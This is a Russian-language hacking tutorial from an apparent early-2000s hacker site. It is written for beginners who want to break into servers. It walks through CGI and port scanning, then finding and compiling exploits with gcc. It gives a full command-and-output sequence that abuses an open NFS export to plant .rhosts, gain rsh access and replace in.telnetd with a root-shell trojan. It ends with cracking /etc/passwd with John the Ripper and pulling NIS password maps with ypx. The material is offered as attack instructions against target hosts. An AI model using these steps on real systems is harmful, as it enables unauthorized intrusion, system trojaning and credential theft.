F.A.Q
HTML
PHP
Haking
Scripting

Файлы
Учебники
Программы

Инфа
Links
WEB мастер




Казахстанский хакерский сайт
Проект [-=DaGo=-] по безопасности компьютерных сетей  и защите информации
ANTICHAT.RU - взлом, защита, анонимность


ОСНОВЫ ВЗЛОМА

 
 

Последнее время я получаю много вопросов по поводу того с чего же всё таки начинать взлом сервера(сайта,странички и тд), мне просто надоело каждый раз отвечать на этот вопрос и я решил написать по этому поводу статью. Итак,приступим. Первое с чего стоит начать это просканировать хост на стандартные CGi сценарии с помощью специальнх сканеров которых слава богу сейчас предостаточно.Ну и что бы вы не потерялись в выборе могу посоветовать лучший (ИМХО) на сегодняшний день-это DCS-D@mned Cgi Scanner предоставленный нам хак-группой D@mnedr,его можно скачать с йх официального сайта www.cc.f2s.com,еще правда есть сканер от груааы Void (www.void.ru) -Но он немного уступает DCS по скорости сканирования. Ок,дальше,сканнер нашел уязвимый скрипт и вы спросите что же делать дальше???,а дальше вам надо найти то как использовать этот эксплоит,я дам вам несколько ссылок где можжно найти описание этих ошибок: qwerty.nanko.ru (наиболее полный но на Английском) www.void.ru www.hack-crack.com или вы можете просто зайти на один из следующих сайтов и просто ввести уязвимый скрипт в строке поиска: www.packetstorm.securify.com www.securityfocus.com www.rootshell.com Второе и пожалуй главное-это сканирование портов,для сканирования можно использовать любой сканнер портов(какой-на ваш выбор-их сейчас везде полно), но опять же хотел бы обратить ваше внимание на сканнер Nscan который можно скачать тут www.nscan.hypermart.net,этот сканер обладает просто потрясающей скоростью сканирования и довольно просто в управлении(правда на сайте лежит Shareware версия которая будет работать только 30 дней) После того как сканер нашел открытые порты вам надо приконнектиться к каждому и посмотреть какая версия программного обеспечения установлена на нём,делаеться это с помощью клиента TELNET который есть даже в Вынь95(98,2000),в коммандной строке TELNET вы пишете telnet>open www.target.com и смотрите версию софта например WU-FTPD 2.6.0(1) Sendmail QPOP IMAP и тд. после того как вы посмотрели версию вы должны найти эксплоит под эту версию,идете опятьже на www.securityfocus.com www.packetstorm.securify.com www.technotronic.com и вводите в строке поиска название программы и его версию После того как вы скачали эксплоит его как правило надо скомпилировать - то есть привисти к рабочему состоянию(как правило) так как большинство серверов в сети висит на *NIX то есть ЮНИКС ЛИНУКС ИРИКс и тд то и компилировать его надо под этими системами Если у вас нет установленного ЮНИКСА то вам в любом случае(если хотите чего нибудь ломать нужен Юникс Шелл-то есть оболочка Юникс) Бесплатно её можно получить на www.nether.net и тому подобных серверах(введите на любом поисковике UNIX+SHELL+FREE) Когда шелл получем и эксплоит скачен то можно приступать к компилированию,обычно эксплоит(в большинстве случаев) это программа на языке С для компиляции будем использовать компилятор GCC итак в командной строке оболочки пишем gcc -o exploit exploit.c и нижимаем Enter хочу так же заметить что программы в Юникс подобный системах запускаються с "./"+имя программы, в нашем случае эксплоит будет запускаться >./exploit Третье-еще один довольно популярный взлом системы это проверка на расшаренные папки,в Юникс то можно проверить с помощью утилиты showmount итак из оболочки запускаем showmount >showmount -e www.target.com и видим /user/ Everyone или что-то другое но если есть Everyone то значит папка открыта на монтирование для всех дальше пишем >mount -t nfs target.remote.com:/user /mnt потом переходми в каталог cd /mnt/home и устанавливаем .rhosts >echo www.target.com user/.rhosts дальше делаем следующее: >cat /etc/passwd user::257:20::/: -смотрим пользователя и создаем такогоже у нас(если возможно) > su - user ! Становимся им $ rsh target.remote.com /bin/csh -i Warning! No access to terminal, job control disabled! ! И заходим на удаленную машину % id uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys) % ls -ldg /usr/etc ! Каталог доступен на запись drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc % grep telnet /etc/inetd.conf telnet stream nowait root /usr/etc/in.telnetd in.telnetd ! Нашли программу, которая запустится !под root"ом из нашего каталога % cd /usr/etc % mv in.telnetd in.telnetd1 ! создаем троянского коня % cat in.telnetd >!/bin/sh exec /bin/csh -i % chmod 755 in.telnetd ! и запускаем его % telnet 127.1 Connecting 127.1. Warning! No access to terminal, job control disabled! > chown user /etc; ! Делаем /etc своим : command not found > exit; : command not found Connection closed by foreign host. > cd /etc после того как у нас есть файл с паролями вы берет расшифровщик паролей Юникс -John The Ripper запускаете его и ждете пока расшифруються пароли потом из шелла коннектитесь на 23 порт и вводите логин с паролем и все вы в системе! И последнее на что я бы хотел обратить внимание в этой статье это проверка NIS сервера Из облочки запускаем >rpcinfo -p www.target.com | grep bind и если видим что=то типа 120000 2 udp 2493 ypbind то пробуем сдлать следующее >ypx -o target.passwd -g target.remote.com Берём файл с паролями и запускаем подборщик. На этом все! Если увас есть какие нибудь вопросы пишите webmaster@hackworld.ru FreeRID aka lEX //TDTeam.(c)

ОГЛВЛЕНИЕ

 



 
  web master EVilBraiN
03 /2003
 
   
Hosted by uCoz